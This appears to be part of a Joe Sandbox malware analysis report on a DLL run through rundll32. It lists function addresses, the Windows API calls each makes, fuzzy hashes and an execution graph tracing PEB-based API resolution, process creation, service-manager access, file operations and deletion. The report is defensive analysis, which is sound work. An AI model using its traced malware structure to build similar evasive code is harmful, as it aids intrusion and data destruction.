                                                                                                                                                            • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                                            • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                                                            • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                                                            • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                                              • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                                              • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                                              • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                                              • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                                              • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                                              • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                                              • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                                            • String ID: %s.dll
                                                                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                                                                            • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                                            • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                                                            • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                                            • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                                            • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                            • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                                            • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                                                            • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                                            • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2949335588-0
                                                                                                                                                            • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                                            • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                                                            • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                                            • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3253506028-0
                                                                                                                                                            • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                                            • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                                                            • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3969253408-0
                                                                                                                                                            • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                                            • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                                            • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                                            • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:15.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:1081
                                                                                                                                                            Total number of Limit Nodes:12
                                                                                                                                                            execution_graph 5241 3781b7 5244 378679 5241->5244 5242 388519 GetPEB 5242->5244 5244->5242 5245 378f65 2 API calls 5244->5245 5246 3786e2 5244->5246 5247 38da22 GetPEB 5244->5247 5248 377ff2 2 API calls 5244->5248 5249 3786c6 5244->5249 5250 37b6cf GetPEB 5244->5250 5253 37b23c 2 API calls 5244->5253 5254 38c264 5244->5254 5258 38458f 5244->5258 5245->5244 5246->5246 5247->5244 5248->5244 5252 381e67 2 API calls 5249->5252 5250->5244 5252->5246 5253->5244 5255 38c291 5254->5255 5256 38aa30 GetPEB 5255->5256 5257 38c2dd 5256->5257 5257->5244 5259 3845a2 5258->5259 5260 38aa30 GetPEB 5259->5260 5261 384619 5260->5261 5261->5244 5262 374ee3 5263 37b6cf GetPEB 5262->5263 5264 375133 5263->5264 5265 37b23c 2 API calls 5264->5265 5266 37514c 5265->5266 5267 3751ad 5266->5267 5268 38dcf7 2 API calls 5266->5268 5269 375167 5268->5269 5270 3747ce GetPEB 5269->5270 5271 37518e 5270->5271 5272 37a8b0 GetPEB 5271->5272 5273 37519b 5272->5273 5274 381f8a 2 API calls 5273->5274 5274->5267 5275 371993 5276 3719dd 5275->5276 5277 38aa30 GetPEB 5276->5277 5278 371a3f 5277->5278 3982 37e991 3983 37ea62 3982->3983 3984 37ea8d 3982->3984 3988 37f8fd 3983->3988 3990 37fde0 3988->3990 3989 37ffd1 4008 37ab87 3989->4008 3990->3989 3993 37ea75 3990->3993 3998 38dcf7 RtlAllocateHeap GetPEB 3990->3998 3999 37a8b0 GetPEB 3990->3999 4004 37b23c 3990->4004 4018 3846bb 3990->4018 4022 38da22 3990->4022 4026 3747ce 3990->4026 4030 37f899 3990->4030 4033 374b61 3990->4033 3993->3984 4001 3793ed 3993->4001 3998->3990 3999->3990 4002 38aa30 GetPEB 4001->4002 4003 379456 ExitProcess 4002->4003 4003->3984 4005 37b254 4004->4005 4037 38aa30 4005->4037 4009 37abb0 4008->4009 4010 374b61 GetPEB 4009->4010 4011 37ad67 4010->4011 4067 377f5d 4011->4067 4013 37ada4 4013->3993 4014 37ad99 4014->4013 4071 381e67 4014->4071 4016 37adc4 4017 381e67 2 API calls 4016->4017 4017->4013 4019 3846da 4018->4019 4020 38aa30 GetPEB 4019->4020 4021 384729 SHGetFolderPathW 4020->4021 4021->3990 4023 38da3d 4022->4023 4075 38adc9 4023->4075 4027 3747f3 4026->4027 4079 37a42d 4027->4079 4031 38aa30 GetPEB 4030->4031 4032 37f8f4 4031->4032 4032->3990 4034 374b74 4033->4034 4082 371ea7 4034->4082 4038 38ab1d 4037->4038 4039 37b2b8 lstrcmpiW 4037->4039 4043 380a0e 4038->4043 4039->3990 4041 38ab33 4046 37cdcd 4041->4046 4050 384087 GetPEB 4043->4050 4045 380aa6 4045->4041 4047 37cdec 4046->4047 4048 37cf0f 4047->4048 4051 38be27 4047->4051 4048->4039 4050->4045 4052 38bfb1 4051->4052 4059 37ade6 4052->4059 4055 38bff5 4057 38c029 4055->4057 4058 37cdcd GetPEB 4055->4058 4057->4048 4058->4057 4060 37adfa 4059->4060 4061 38aa30 GetPEB 4060->4061 4062 37ae57 4061->4062 4062->4055 4063 38cadf 4062->4063 4064 38caf5 4063->4064 4065 38aa30 GetPEB 4064->4065 4066 38cb50 4065->4066 4066->4055 4068 377f8e 4067->4068 4069 38aa30 GetPEB 4068->4069 4070 377fd4 CreateProcessW 4069->4070 4070->4014 4072 381e7d 4071->4072 4073 38aa30 GetPEB 4072->4073 4074 381edb CloseHandle 4073->4074 4074->4016 4076 38adee 4075->4076 4077 38aa30 GetPEB 4076->4077 4078 38ae5d 4077->4078 4078->3990 4080 38aa30 GetPEB 4079->4080 4081 37480e 4080->4081 4081->3990 4083 371ebc 4082->4083 4086 37702c 4083->4086 4087 377049 4086->4087 4088 38aa30 GetPEB 4087->4088 4089 371f4c 4088->4089 4089->3990 4090 372950 4095 382550 4090->4095 4093 3793ed 2 API calls 4094 372a1a 4093->4094 4132 383775 4095->4132 4098 388519 GetPEB 4098->4132 4102 383ff6 4351 387dd5 4102->4351 4103 383fe1 4344 3791b0 4103->4344 4108 372a06 4108->4093 4113 383fbb 4333 38cb5b 4113->4333 4114 38e1d4 RtlAllocateHeap GetPEB 4114->4132 4129 387ba6 RtlAllocateHeap GetPEB 4129->4132 4132->4098 4132->4102 4132->4103 4132->4108 4132->4113 4132->4114 4132->4129 4133 37a8b0 GetPEB 4132->4133 4134 3820ba 4132->4134 4144 384116 4132->4144 4152 380326 4132->4152 4156 3759f2 4132->4156 4166 3895fa 4132->4166 4177 38044f 4132->4177 4191 385cc4 4132->4191 4204 3887d1 4132->4204 4209 3764e2 4132->4209 4219 38473c 4132->4219 4226 375361 4132->4226 4234 381ddd 4132->4234 4238 390056 4132->4238 4249 3866ca 4132->4249 4259 372251 4132->4259 4266 37b2c7 4132->4266 4278 381ee7 4132->4278 4281 389eec 4132->4281 4290 3751bb 4132->4290 4295 388be3 4132->4295 4299 37dff3 4132->4299 4306 387d48 4132->4306 4309 38d2ce 4132->4309 4314 378dc4 4132->4314 4318 376d24 4132->4318 4327 389bcf 4132->4327 4133->4132 4138 3823c3 4134->4138 4135 382503 4137 38da22 GetPEB 4135->4137 4141 382501 4137->4141 4138->4135 4140 3846bb 2 API calls 4138->4140 4138->4141 4365 388f9e 4138->4365 4369 37912c 4138->4369 4373 377ff2 4138->4373 4378 37a55f 4138->4378 4140->4138 4141->4132 4148 3843df 4144->4148 4149 38da22 GetPEB 4148->4149 4150 381e67 2 API calls 4148->4150 4151 384508 4148->4151 4400 379350 4148->4400 4404 378f65 4148->4404 4408 38c1ec 4148->4408 4149->4148 4150->4148 4151->4132 4153 380340 4152->4153 4154 38044a 4153->4154 4155 379011 RtlAllocateHeap GetPEB LoadLibraryW 4153->4155 4154->4132 4155->4153 4163 375caf 4156->4163 4157 375db3 4426 373c3c 4157->4426 4160 375db1 4160->4132 4161 38da22 GetPEB 4161->4163 4163->4157 4163->4160 4163->4161 4164 3747ce GetPEB 4163->4164 4412 3913ad 4163->4412 4436 38dcf7 4163->4436 4440 37a8b0 4163->4440 4164->4163 4172 3899cc 4166->4172 4168 38dcf7 2 API calls 4168->4172 4169 389ba9 4171 381e67 2 API calls 4169->4171 4170 389ba7 4170->4132 4171->4170 4172->4168 4172->4169 4172->4170 4173 378f65 2 API calls 4172->4173 4174 3747ce GetPEB 4172->4174 4175 37a8b0 GetPEB 4172->4175 4176 38c1ec GetPEB 4172->4176 4466 375ddd 4172->4466 4173->4172 4174->4172 4175->4172 4176->4172 4190 380859 4177->4190 4179 38dcf7 2 API calls 4179->4190 4180 3809d9 4182 388519 GetPEB 4180->4182 4181 380894 4478 37957d 4181->4478 4187 3809ec 4182->4187 4185 3808b3 4185->4132 4186 377ff2 RtlAllocateHeap GetPEB 4186->4190 4188 388519 GetPEB 4187->4188 4188->4185 4189 37a8b0 GetPEB 4189->4190 4190->4179 4190->4180 4190->4181 4190->4185 4190->4186 4190->4189 4470 379462 4190->4470 4474 380dd6 4190->4474 4200 3863a1 4191->4200 4192 388f9e 2 API calls 4192->4200 4194 38dcf7 2 API calls 4194->4200 4195 386521 4196 388f9e 2 API calls 4195->4196 4197 386543 4196->4197 4197->4132 4199 3846bb 2 API calls 4199->4200 4200->4192 4200->4194 4200->4195 4200->4197 4200->4199 4201 37912c 2 API calls 4200->4201 4203 37a8b0 GetPEB 4200->4203 4482 37d6d8 4200->4482 4495 371cec 4200->4495 4499 381652 4200->4499 4201->4200 4203->4200 4206 38888d 4204->4206 4207 388935 4206->4207 4522 37ee08 4206->4522 4526 38ab5e 4206->4526 4207->4132 4215 37651f 4209->4215 4211 388519 GetPEB 4211->4215 4213 374b61 GetPEB 4213->4215 4214 376bd9 4214->4132 4215->4211 4215->4213 4215->4214 4530 38a666 4215->4530 4540 38f435 4215->4540 4558 37cf47 4215->4558 4570 375548 4215->4570 4579 38e395 4215->4579 4222 384a28 4219->4222 4220 37912c 2 API calls 4220->4222 4221 384b7d 4221->4132 4222->4220 4222->4221 4223 388f9e GetPEB CloseServiceHandle 4222->4223 4225 3742c4 2 API calls 4222->4225 4744 37e249 4222->4744 4223->4222 4225->4222 4229 37537b 4226->4229 4227 388519 GetPEB 4227->4229 4228 377ff2 2 API calls 4228->4229 4229->4227 4229->4228 4231 37553e 4229->4231 4748 37960d 4229->4748 4752 390f33 4229->4752 4762 37924b 4229->4762 4231->4132 4235 381df2 4234->4235 4236 38aa30 GetPEB 4235->4236 4237 381e5c 4236->4237 4237->4132 4248 390720 4238->4248 4240 37cb52 GetPEB 4240->4248 4241 3846bb 2 API calls 4241->4248 4243 3909a3 4243->4132 4245 37a8b0 GetPEB 4245->4248 4246 38dcf7 RtlAllocateHeap GetPEB 4246->4248 4247 381652 GetPEB 4247->4248 4248->4240 4248->4241 4248->4243 4248->4245 4248->4246 4248->4247 4857 37f002 4248->4857 4861 37aad6 4248->4861 4865 371fd1 4248->4865 4869 385c73 4249->4869 4251 3913ad 2 API calls 4258 386a65 4251->4258 4252 38dcf7 RtlAllocateHeap GetPEB 4252->4258 4253 386bbb 4253->4132 4254 38d25e GetPEB 4254->4258 4255 3747ce GetPEB 4255->4258 4257 37a8b0 GetPEB 4257->4258 4258->4251 4258->4252 4258->4253 4258->4254 4258->4255 4258->4257 4872 38453f 4258->4872 4263 37227a 4259->4263 4260 372918 4261 390e3a GetPEB 4260->4261 4262 372916 4261->4262 4262->4132 4263->4260 4263->4262 4264 390e3a GetPEB 4263->4264 4265 377ff2 2 API calls 4263->4265 4264->4263 4265->4263 4271 37b2df 4266->4271 4267 377ff2 2 API calls 4267->4271 4271->4267 4275 37b6c2 4271->4275 4876 380b19 4271->4876 4883 380e53 4271->4883 4895 386df8 4271->4895 4916 384b87 4271->4916 4937 37f09b 4271->4937 4949 379714 4271->4949 4957 381889 4271->4957 4968 37b74d 4271->4968 4275->4132 4279 378dc4 GetPEB 4278->4279 4280 381f83 4279->4280 4280->4132 4287 38a152 4281->4287 4283 388519 GetPEB 4283->4287 4286 38a2de 4286->4132 4287->4283 4287->4286 4288 37f899 GetPEB 4287->4288 5081 37a9ce 4287->5081 5085 378ece 4287->5085 5089 374346 4287->5089 5096 374e7d 4287->5096 4288->4287 4291 375275 4290->4291 4293 3752b8 4291->4293 4294 377ff2 2 API calls 4291->4294 5104 380001 4291->5104 4293->4132 4294->4291 4297 388e25 4295->4297 4296 38d25e GetPEB 4296->4297 4297->4296 4298 388ef1 4297->4298 4298->4132 4300 37e1a7 4299->4300 4301 377ff2 2 API calls 4300->4301 4302 37e207 4300->4302 4304 37e205 4300->4304 5133 377af6 4300->5133 4301->4300 4303 3746be GetPEB 4302->4303 4303->4304 4304->4132 4307 377ff2 2 API calls 4306->4307 4308 387dc1 4307->4308 4308->4132 4310 385c73 GetPEB 4309->4310 4311 38d370 4310->4311 5137 388b55 4311->5137 4315 378ddd 4314->4315 4316 38aa30 GetPEB 4315->4316 4317 378e3e 4316->4317 4317->4132 4325 376f44 4318->4325 4319 376ffc 5141 379dcf 4319->5141 4320 37b6cf GetPEB 4320->4325 4322 376ffa 4322->4132 4323 38dcf7 2 API calls 4323->4325 4324 3747ce GetPEB 4324->4325 4325->4319 4325->4320 4325->4322 4325->4323 4325->4324 4326 37a8b0 GetPEB 4325->4326 4326->4325 4331 389d3b 4327->4331 4328 389e49 4328->4132 4329 37b6cf GetPEB 4329->4331 4331->4328 4331->4329 5164 3752c2 4331->5164 5167 379b83 4331->5167 4341 38cb83 4333->4341 4334 38dcf7 RtlAllocateHeap GetPEB 4334->4341 4335 38d0a6 4338 37ab87 3 API calls 4335->4338 4336 3846bb 2 API calls 4336->4341 4337 38d259 4337->4337 4339 38d0d0 4338->4339 4339->4108 4340 381652 GetPEB 4340->4341 4341->4334 4341->4335 4341->4336 4341->4337 4341->4340 4343 37a8b0 GetPEB 4341->4343 5205 38e32e 4341->5205 4343->4341 4345 3791be 4344->4345 4346 380da3 4345->4346 4347 388519 GetPEB 4345->4347 4348 378dc4 GetPEB 4345->4348 4349 389e56 GetPEB 4345->4349 4350 381e67 2 API calls 4345->4350 4346->4108 4347->4345 4348->4345 4349->4345 4350->4345 4364 388118 4351->4364 4353 388245 4353->4108 4354 38dcf7 2 API calls 4354->4364 4355 388247 4356 37b6cf GetPEB 4355->4356 4360 38825f 4356->4360 4357 3913ad 2 API calls 4357->4364 4358 38473c 4 API calls 4358->4364 4359 3747ce GetPEB 4359->4364 5225 37b1c6 4360->5225 4363 37a8b0 GetPEB 4363->4364 4364->4353 4364->4354 4364->4355 4364->4357 4364->4358 4364->4359 4364->4363 5209 373e3f 4364->5209 5218 386c49 4364->5218 4366 388fb3 4365->4366 4367 38aa30 GetPEB 4366->4367 4368 388ffc CloseServiceHandle 4367->4368 4368->4138 4370 379149 4369->4370 4371 38aa30 GetPEB 4370->4371 4372 3791a2 OpenSCManagerW 4371->4372 4372->4138 4385 371db9 4373->4385 4377 3780db 4377->4138 4384 37a73c 4378->4384 4380 37a7f0 4396 373bc0 4380->4396 4381 38da22 GetPEB 4381->4384 4383 37a7ee 4383->4138 4384->4380 4384->4381 4384->4383 4392 37cb52 4384->4392 4386 38aa30 GetPEB 4385->4386 4387 371e19 4386->4387 4388 371e22 4387->4388 4389 371e3d 4388->4389 4390 38aa30 GetPEB 4389->4390 4391 371e96 RtlAllocateHeap 4390->4391 4391->4377 4393 37cb6b 4392->4393 4394 38aa30 GetPEB 4393->4394 4395 37cbd4 4394->4395 4395->4384 4397 373bd8 4396->4397 4398 38aa30 GetPEB 4397->4398 4399 373c2d 4398->4399 4399->4383 4401 379371 4400->4401 4402 38aa30 GetPEB 4401->4402 4403 3793db 4402->4403 4403->4148 4405 378f90 4404->4405 4406 38aa30 GetPEB 4405->4406 4407 378ff5 CreateFileW 4406->4407 4407->4148 4409 38c1fb 4408->4409 4410 38aa30 GetPEB 4409->4410 4411 38c258 4410->4411 4411->4148 4413 3913cb 4412->4413 4414 374b61 GetPEB 4413->4414 4415 391621 4414->4415 4416 374b61 GetPEB 4415->4416 4417 391637 4416->4417 4418 374b61 GetPEB 4417->4418 4419 39164d 4418->4419 4420 373bc0 GetPEB 4419->4420 4421 391666 4420->4421 4422 373bc0 GetPEB 4421->4422 4423 391681 4422->4423 4444 374ddd 4423->4444 4425 3916bf 4425->4163 4427 373c56 4426->4427 4428 38dcf7 2 API calls 4427->4428 4429 373d7a 4428->4429 4448 37a918 4429->4448 4432 37a8b0 GetPEB 4433 373da2 4432->4433 4452 381f8a 4433->4452 4435 373db4 4435->4160 4437 38dd0c 4436->4437 4438 377ff2 2 API calls 4437->4438 4439 38dd93 4438->4439 4439->4163 4441 37a8c2 4440->4441 4456 388519 4441->4456 4445 374df6 4444->4445 4446 38aa30 GetPEB 4445->4446 4447 374e69 SHFileOperationW 4446->4447 4447->4425 4449 37a936 4448->4449 4450 37a42d GetPEB 4449->4450 4451 373d95 4450->4451 4451->4432 4453 381f99 4452->4453 4454 38aa30 GetPEB 4453->4454 4455 381fef DeleteFileW 4454->4455 4455->4435 4457 388529 4456->4457 4458 371db9 GetPEB 4457->4458 4459 3885ed 4458->4459 4462 37a30c 4459->4462 4463 37a326 4462->4463 4464 38aa30 GetPEB 4463->4464 4465 37a392 4464->4465 4465->4163 4467 375dff 4466->4467 4468 38aa30 GetPEB 4467->4468 4469 375e4f SetFileInformationByHandle 4468->4469 4469->4172 4471 379481 4470->4471 4472 38aa30 GetPEB 4471->4472 4473 3794da 4472->4473 4473->4190 4475 380df7 4474->4475 4476 38aa30 GetPEB 4475->4476 4477 380e3f 4476->4477 4477->4190 4479 379595 4478->4479 4480 38aa30 GetPEB 4479->4480 4481 3795ff 4480->4481 4481->4185 4491 37d70e 